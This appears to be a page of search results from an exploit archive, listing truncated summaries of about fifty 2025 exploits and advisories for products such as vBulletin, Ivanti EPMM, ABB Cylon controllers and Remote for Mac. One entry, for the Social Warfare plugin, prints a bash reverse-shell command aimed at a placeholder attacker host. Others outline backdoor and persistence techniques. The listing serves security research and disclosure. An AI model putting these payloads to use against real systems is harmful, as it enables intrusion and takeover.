50738 matches found
๐ TightVNC 2.8.83 Control Pipe Manipulation
TightVNC version 2.8.83 suffers from a control pipe manipulation vulnerability. Exploit Title: TightVNC 2.8.83 - Control Pipe Manipulation Date: 06/09/2025 Exploit Author: Ionut Zevedei [email protected] Exploit Repository: https://github.com/zeved/CVE-2024-42049-PoC Vendor Homepage:...
๐ Remote for Mac 2025.7 Unauthenticated Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution vulnerability in Remote for Mac versions up to and including 2025.7 via the /api/executeScript endpoint. When authentication is disabled on the target system, it allows attackers to execute arbitrary AppleScript commands,...
๐ RAD FT Dell Firmware A00-00 Privilege Escalation
RAD FT Firmware versions A00-00 Build WP0000051154 and prior are susceptible to a privilege escalation vulnerability due to a failure to properly filter the user-supplied input through the .NET Profiler. Exploit name: RAD FT Dell Firmware Download link:...
๐ FUDForum 3.2.0 Command Injection
FUDForum version 3.2.0 suffers from a code injection vulnerability. Exploit Title: FUDForum 3.2.0 Command Injection Authenticated Exploit Author: tmrswrr Vendor Homepage: http://fudforum.org/ Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum3.2.0.zip/download Version : 3.2.0...
๐ vBulletin 4.x movepm PHP Object Injection
In vBulletin 4.x, a flawed security patch from 2014 has introduced a new post-auth PHP object injection vector by replacing serialize with jsonencode โ ironically making it possible to get vBulletin to sign attacker-controlled base64-encoded payloads, potentially allowing users to perform remote...
๐ Microsoft Windows Server 2025 JScript Engine Remote Code Execution
This proof of concept exploits a use-after-free vulnerability in jscript.dll to achieve code execution via heap spraying. The shellcode executes calc.exe as a demonstration of code execution. !/usr/bin/env python3 Exploit Title: Microsoft Windows Server 2025 JScript Engine - Remote Code Execution...
๐ macOS / iOS Local Privilege Escalation
This local privilege escalation exploit leverages a vulnerable macOS LaunchDaemon plist configuration to execute arbitrary commands with root privileges. The exploit creates a root payload script that adds a root shell binary, creates an admin user, and installs a persistent LaunchDaemon backdoor...
๐ HRM 1.0 2025 Cross Site Scripting
HRM version 1.0 2025 suffers from a cross site scripting vulnerability. Titles: HRM-1.0 2025 Cross-site scripting reflected Author: nu11secur1ty Date: 06/06/2025 Vendor: https://github.com/oretnom23 Software:...
๐ Apache Tomcat 10.1.39 Denial of Service
Apache Tomcat version 10.1.39 suffers from a denial of service vulnerability. Exploit Title: Apache Tomcat 10.1.39 - Denial of Service DOS Author: Abdualhadi khalifa CVE: CVE-2025-31650 import httpx import asyncio import random import urllib.parse import sys import socket from colorama import ini...
๐ ABB Cylon Aspect 3.08.04 DeploySource Unauthenticated Remote Code Execution
ABB Cylon Aspect BMS/BAS version 3.08.04 is vulnerable to a critical flaw in the AuthenticatedHttpServlet within its application server, enabling remote attackers to bypass authentication by setting the Host: 127.0.0.1 header. This deceives the server into processing requests as if they originate...
๐ Udev Persistence
This Metasploit module will add a script in /lib/udev/rules.d/ in order to execute a payload written on disk. It will be executed with root privileges every time a network interface other than l0 comes up. This module requires Metasploit: https://metasploit.com/download Current source:...
๐ Ivanti EPMM Authentication Bypass for Expression Language Remote Code Execution
This Metasploit module exploits an unauthenticated remote code execution exploit chain for Ivanti EPMM, tracked as CVE-2025-4427 and CVE-2025-4428. An authentication flaw permits unauthenticated access to an administrator web API endpoint, which allows for code execution via expression language...
๐ Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability in the Send Message functionality. Exploit Title: Stored XSS "Send Message" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
๐ Adapt CMS 3.0.3 Remote Shell Upload
Adapt CMS version 3.0.3 suffers from a remote shell upload vulnerability. Exploit Title: Authenticated File Upload to RCE - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Authenticated File Upload to RCE 1:...
๐ ERPNext 15.53.1 Cross Site Scripting
ERPNext version 15.53.1 suffers from multiple persistent cross site scripting vulnerabilities. An authenticated user can inject malicious JavaScript into the userimage field of the profile page using an XSS payload within the file path or HTML context. This field is rendered without sufficient...
๐ Adapt CMS 3.0.3 Cross Site Scripting
Adapt CMS version 3.0.3 suffers from a persistent cross site scripting vulnerability via file upload. Exploit Title: Stored XSS via File Upload - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog: https://msecureltd.blogspot.com/ Stored XSS via...
๐ PSF Request Library Credential Leak
The PSF requests library leaks .netrc credentials to third parties due to incorrect URL processing under specific conditions. The PSF requests library https://github.com/psf/requests & https://pypi.org/project/requests/ leaks .netrc credentials to third parties due to incorrect URL processing und...
๐ Adapt CMS 3.0.3 Insecure Direct Object Reference / Incorrect Authorization
Adapt CMS version 3.0.3 suffers from an insecure direct object reference vulnerability that allows for privilege escalation. Exploit Title: IDOR "Change Password" Functionality - adaptcmsv3.0.3 Date: 06/2025 Exploit Author: Andrey Stoykov Version: 3.0.3 Tested on: Debian 12 Blog:...
๐ WordPress Social Warfare 3.5.2 Remote Code Execution
Proof of concept remote code execution exploit for WordPress Social Warfare plugin versions 3.5.2 and below. !/usr/bin/env python3 Exploit Title: CVE-2019-9978: Remote Code Execution in Social Warfare WordPress Plugin system"bash -c \"bash -i & /dev/tcp/ATTACKERIP/LISTENPORT 0&1\""' with...
๐ Microsoft Windows Registry Protection Removal
Thanks to OFFREG.dll, every unprivileged user can copy the registry tree HKEYCURRENTUSER except of course the registry keys where the policies are stored to an offline registry hive ntuser.man and thus get rid of any restrictions previously imposed via user group policies after logging off and on...
๐ CloudClassroom PHP Project 1.0 SQL Injection
CloudClassroom PHP Project version 1.0 suffers from a time-based blind remote SQL Injection vulnerability. Hello Full Disclosure list, I am sharing details of a newly assigned CVE affecting an open-source educational software project:...
๐ Motivian Content Management System 41.0.0 Arbitrary File Upload
Motivian Content Management System version 41.0.0 suffers from an arbitrary file upload vulnerability. CVE-2025-29093-Arbitrary-File-Upload This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29093: Arbitrary File Upload This...
๐ WatchGuard 12.11 Memory Corruption
WatchGuard version 12.11 memory corruption proof of concept exploit. โ$ cat watchguard12.11postauthclibof.py !/usr/bin/env python3 watchguard12.11postauthclibof.py this is a poc for post authorized stack overflow found in 'cli' binary. Tue Feb 4 06:12:20 EST 2025 by code610 More: networkdevice=...
๐ Motivian Content Management System 41.0.0 Cross Site Scripting
Motivian Content Management System version 41.0.0 suffers from multiple cross site scripting vulnerabilities. CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS This repository reveals a security vulnerability discovered in Motivian Content Management System v.41.0.0. - CVE-2025-29094:...
๐ Unifiedtransform 2.x Student Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify student records via the /students/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify student records via the /students/edit/id...
๐ Unifiedtransform 2.x Course Editor Missing Authorization
Unifiedtransform version 2.x allows any user to access and modify course records via the /course/edit/id endpoints. Description Unifiedtransform v2.X is vulnerable to Incorrect Access Control. Any user students and teachers can access and modify course details via the /course/edit/id endpoints...
๐ RustFly 2.0.0 Remote Code Execution
RustFly version 2.0.0 contains a critical vulnerability in its remote input processing layer that allows unauthenticated attackers to achieve remote code execution. RustFly v2.0.0- Remote Code Execution RCE Exploit Title: RustFly v2.0.0- Remote Code Execution RCE Date: 2025-05-29 Exploit Author:...
๐ Campcodes Online Hospital Management System 1.0 SQL Injection
Campcodes Online Hospital Management System version 1.0 suffers from a remote SQL injection vulnerability. Exploit Title: Campcodes Online Hospital Management System 1.0 - SQL Injection Google Dork: N/A Exploit Author: Carine Constantino Vendor Homepage: https://www.campcodes.com Software Link:...
๐ Kion Exchange Programs Software 1.21.9092.29966 Cross Site Scripting
Kion Exchange Programs Software versions 1.21.9092.29966 and below suffer from a cross site scripting vulnerability. Exploit Title: Kion Exchange Programs Software Reflected XSS CVE: CVE-2024-7130 PoC-Date: 2025-05-28 Exploit Author: Kutay ERGEN Vendor Homepage: https://www.kionexchangeprograms.c...
๐ Fortra GoAnywhere MFT 7.4.1 Authentication Bypass
Fortra GoAnywhere MFT version 7.4.1 proof of concept authentication bypass exploit. !/usr/bin/env python3 -- coding: utf-8 -- Exploit Title: Fortra GoAnywhere MFT 7.4.1 - Authentication Bypass Date: 2025-05-25 Exploit Author: @ibrahimsql Exploit Author's github: https://github.com/ibrahimsql Vend...
๐ Automic Agent 24.3.0 HF4 Privilege Escalation
Automic Agent version 24.3.0 HF4 suffers from a privilege escalation vulnerability. Exploit Title: Automic Agent 24.3.0 HF4 - Privilege Escalation Date: 26.05.2025 Exploit Author: Flora Schรคfer Vendor Homepage: https://www.broadcom.com/products/software/automation/automic-automation Version:...
๐ Windows File Explorer NTLM Hash Disclosure
Windows File Explorer on Microsoft Windows 11 23H2 proof of concept NTLM hash disclosure exploit. !/usr/bin/env python3 Exploit Title: Windows File Explorer Windows 11 23H2 - NTLM Hash Disclosure Exploit Author: Mohammed Idrees Banyamer Twitter/GitHub:https://github.com/mbanyamer Date: 2025-05-27...
๐ Remote for Mac 2025.6 Unauthenticated Arbitrary Input
Remote for Mac version 2025.6 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-28 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
๐ eCharge Hardy Barth cPH2 / cPP2 Charging Stations 2.2.0 Command Injection / Backdoor
eCharge Hardy Barth cPH2 and cPP2 Charging Stations version 2.2.0 suffer from missing authentication, OS command injection, backdoor user accounts, backdoor functionality, and hardcoded key vulnerabilities. SEC Consult Vulnerability Lab Security Advisory...
๐ Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS...
๐ Frappe Framework 15.56.1 SQL Injection
Frappe Framework version 15.56.1 suffers from a remote SQL injection vulnerability. An authenticated SQL injection vulnerability exists in the frappe.desk.reportview.getlist API of the Frappe Framework, affecting versions v15.56.1. The vulnerability stems from improper sanitization of the fields...
๐ Remote for Mac 2025.6 Desktop Stream Disclosure
Remote for Mac version 2025.6 suffers from an unauthenticated desktop stream disclosure vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Stream Exploit Date: 2025-05-27 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
๐ KRUKSTON BISTRO 1.0 SQL Injection
KRUKSTON BISTRO version 1.0 suffers from a remote SQL injection vulnerability. Titles: KRUKSTON-BISTRO-1.0 Multiple-SQLi Author: nu11secur1ty Date: 05/27/2025 Vendor: https://www.mayurik.com/ Software: https://www.sourcecodester.com/php/16127/best-pos-management-system-php.html Reference:...
๐ Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 allows an unauthenticated remote attacker to achieve remote code execution by sending a crafted sequence of UDP packets that simulate keyboard input. Exploit Title: Remote for Mac 2025.6 - Remote Code Execution RCE Date: 2025-05-27 Exploit Author: Chokri Hammedi Vend...
๐ Remote for Windows 2024.15 Unauthenticated Arbitrary Input
Remote for Windows version 2024.15 allows for unauthenticated arbitrary input into the active window. Exploit Title: Remote for Windows 2024.15 - Unauthenticated Arbitrary Input into Active Window Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link:...
๐ Remote for Mac 2025.6 Remote Code Execution
Remote for Mac version 2025.6 suffers from an unauthenticated remote code execution vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated RCE Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link: https://cherpake.com/latest.php?os=ma...
๐ Java-springboot-codebase 1.1 Arbitrary File Read
Java-sprintboot-codebase version 1.1 suffers from an arbitrary file read vulnerability. Exploit Title: Java-springboot-codebase 1.1 - Arbitrary File Read Google Dork: Date: 23/May/2025 Exploit Author: d3sca Vendor Homepage: https://github.com/OsamaTaher/Java-springboot-codebase Software Link:...
๐ Remote for Windows 2024.15 Unquoted Service Path
Remote for Windows version 2024.15 suffers from an unquoted service path vulnerability. Exploit Title: Remote for Windows 2024.15 - Unquoted Service Path Date: 2025-05-23 Exploit Author: Chokri Hammedi Vendor Homepage: https://rs.ltd Software Link: https://rs.ltd/latest.php?os=win Version: 2024.1...
๐ Remote for Mac 2025.6 Desktop Screenshot Capture
Remote for Mac version 2025.6 suffers from an unauthenticated desktop screenshot capture vulnerability. Exploit Title: Remote for Mac 2025.6 - Unauthenticated Desktop Screenshot Capture Date: 2025-05-26 Exploit Author: Chokri Hammedi Vendor Homepage: https://cherpake.com/ Software Link:...
๐ WordPress User Registration and Membership 4.1.2 Authentication Bypass
WordPress User Registration and Membership plugin versions 4.1.2 and below suffer from an authentication bypass vulnerability. !/usr/bin/env python3 Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass Date: 2025-05-22 Exploit Author: Mohammed Idrees Banyam...
๐ vBulletin replaceAdTemplate Remote Code Execution
vBulletin replaceAdTemplate remote code execution proof of concept exploit. Versions 5.0.0 through 6.0.3 are affected. ?php / ----------------------------------------------------------------- vBulletin replaceAdTemplate Remote Code Execution Vulnerability...
๐ Palo Alto 11.1.4-h7 Memory Corruption
Palo Alto version 11.1.4-h7 post authentication memory corruption proof of concept exploit. !/usr/bin/env python3 post auth cli memory corruption poc for paloalto 11.1.4-h7 19.01.2025 @ 00:23 postauth user in general 'admin' but we'll get back to that later ; can use cli to provide one of the...
๐ Grandstream GSD3710 1.0.11.13 Stack Buffer Overflow
Grandstream GSD3710 version 1.0.11.13 suffers from a stack buffer overflow vulnerability. !/usr/bin/env python3 Exploit Title: Grandstream GSD3710 1.0.11.13 - Stack Buffer Overflow Google Dork: if applicable Date: 2025-05-23 Exploit Author: Pepelux user in ExploitDB Vendor Homepage:...
๐ ABB Cylon Aspect 3.08.03 projectUpdateBSXFileProcess.php Remote Guest2Root
The ABB BMS/BAS controller is vulnerable to code execution and sudo misconfiguration flaws. An authenticated remote code execution vulnerability in the firmware update mechanism allows an attacker with valid credentials to escalate privileges and execute commands as root. The process involves...
๐ ABB Cylon Aspect 3.08.03 productRemovalUpdate.php Remote Code Execution
The ABB BMS/BAS controller suffers from an authenticated blind OS command injection vulnerability. This can be exploited to inject and execute arbitrary shell commands through the 'instance' HTTP POST parameter called by the productRemovalUpdate.php script. The token key POST param needs to be se...